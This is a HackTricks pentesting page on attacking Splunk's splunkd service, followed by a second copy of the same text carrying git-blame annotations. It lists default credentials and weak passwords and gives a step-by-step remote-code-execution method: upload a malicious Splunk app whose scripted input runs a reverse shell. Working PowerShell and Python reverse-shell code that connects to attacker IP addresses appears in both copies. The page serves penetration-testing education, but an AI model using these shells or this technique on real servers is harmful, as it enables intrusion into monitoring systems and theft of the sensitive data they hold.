hacktricks/network-services-pentesting/8089-splunkd.md

# 8089 - Pentesting Splunkd

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


## **Basic Information**

* Log analytics tool used for data gathering, analysis, and visualization
* Commonly used in security monitoring and business analytics
* Default ports:
  * Web server: 8000
  * Splunkd service: 8089

### Vulnerability Vectors:

1. Free Version Exploitation

* Trial version automatically converts to free version after 60 days
* Free version lacks authentication
* Potential security risk if left unmanaged
* Administrators may overlook security implications

2. Credential Weaknesses

* Older versions: Default credentials `admin:changeme`
* Newer versions: Credentials set during installation
* Potential for weak password use (e.g., `admin`, `Welcome`, `Password123`)

3. Remote Code Execution Opportunities

* Multiple code execution methods:
  * Server-side Django applications
  * REST endpoints
  * Scripted inputs
  * Alerting scripts
* Cross-platform support (Windows/Linux)
* Scripted inputs can run:
  * Bash scripts
  * PowerShell scripts
  * Batch scripts

Key Exploitation Potential:

* Sensitive data storage
* Lack of authentication in free version
* Multiple vectors for potential remote code execution
* Possibility of leveraging scripted inputs for system compromise

### Shodan

* `Splunk build`

## RCE

### Create Custom Application

Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.

A custom application can run **Python, Batch, Bash, or PowerShell scripts**. Moreover, **Splunk comes with Python installed**, so even in **Windows** systems you will be able to run python code.

You can use [**this**](https://github.com/0xjpuff/reverse_shell_splunk) example with the **`bin`** containing example for [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1). Or you could create your own.

The exploitation process follows a consistent methodology across platforms:

```
splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)
```

The critical configuration file `inputs.conf` enables the script by:

* Setting `disabled = 0`
* Configuring a 10-second execution interval
* Defining the script's source type

Deployment is straightforward:

1. Create the malicious application package
2. Set up a listener (Netcat/socat) on the attacking machine
3. Upload the application through Splunk's interface
4. Trigger automatic script execution upon upload

Sample Windows PowerShell reverse shell:

```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()
};
$client.Close()
```

Sample Linux Python reverse shell:

```python
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
```

### RCE & Privilege Escalation

In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:

{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}

## References

* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
Recreating repository history 2024-12-12 10:39:29 +00:00			`# 8089 - Pentesting Splunkd`

			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`

			`</details>`
			`{% endhint %}`

a 2024-12-12 11:33:56 +00:00
Recreating repository history 2024-12-12 10:39:29 +00:00			`## Basic Information`

			`* Log analytics tool used for data gathering, analysis, and visualization`
			`* Commonly used in security monitoring and business analytics`
			`* Default ports:`
			`* Web server: 8000`
			`* Splunkd service: 8089`

			`### Vulnerability Vectors:`

			`1. Free Version Exploitation`

			`* Trial version automatically converts to free version after 60 days`
			`* Free version lacks authentication`
			`* Potential security risk if left unmanaged`
			`* Administrators may overlook security implications`

			`2. Credential Weaknesses`

			* Older versions: Default credentials `admin:changeme`
			`* Newer versions: Credentials set during installation`
			* Potential for weak password use (e.g., `admin`, `Welcome`, `Password123`)

			`3. Remote Code Execution Opportunities`

			`* Multiple code execution methods:`
			`* Server-side Django applications`
			`* REST endpoints`
			`* Scripted inputs`
			`* Alerting scripts`
			`* Cross-platform support (Windows/Linux)`
			`* Scripted inputs can run:`
			`* Bash scripts`
			`* PowerShell scripts`
			`* Batch scripts`

			`Key Exploitation Potential:`

			`* Sensitive data storage`
			`* Lack of authentication in free version`
			`* Multiple vectors for potential remote code execution`
			`* Possibility of leveraging scripted inputs for system compromise`

			`### Shodan`

			* `Splunk build`

			`## RCE`

			`### Create Custom Application`

			`Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.`

			`A custom application can run Python, Batch, Bash, or PowerShell scripts. Moreover, Splunk comes with Python installed, so even in Windows systems you will be able to run python code.`

			You can use [this](https://github.com/0xjpuff/reverse_shell_splunk) example with the `bin` containing example for [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1). Or you could create your own.

			`The exploitation process follows a consistent methodology across platforms:`

			```
			`splunk_shell/`
			`├── bin (reverse shell scripts)`
			`└── default (inputs.conf configuration)`
			```

			The critical configuration file `inputs.conf` enables the script by:

			* Setting `disabled = 0`
			`* Configuring a 10-second execution interval`
			`* Defining the script's source type`

			`Deployment is straightforward:`

			`1. Create the malicious application package`
			`2. Set up a listener (Netcat/socat) on the attacking machine`
			`3. Upload the application through Splunk's interface`
			`4. Trigger automatic script execution upon upload`

			`Sample Windows PowerShell reverse shell:`

			```powershell
			`$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);`
			`$stream = $client.GetStream();`
			`[byte[]]$bytes = 0..65535\|%{0};`
			`while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){`
			`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);`
			`$sendback = (iex $data 2>&1 \| Out-String );`
			`$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';`
			`$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);`
			`$stream.Write($sendbyte,0,$sendbyte.Length);`
			`$stream.Flush()`
			`};`
			`$client.Close()`
			```

			`Sample Linux Python reverse shell:`

			```python
			`import sys, socket, os, pty`
			`ip = "10.10.14.15"`
			`port = "443"`
			`s = socket.socket()`
			`s.connect((ip, int(port)))`
			`[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]`
			`pty.spawn('/bin/bash')`
			```

			`### RCE & Privilege Escalation`

			`In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:`

			`{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}`
			`[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)`
			`{% endcontent-ref %}`

			`## References`

			`* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)`

			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`

			`</details>`
			`{% endhint %}`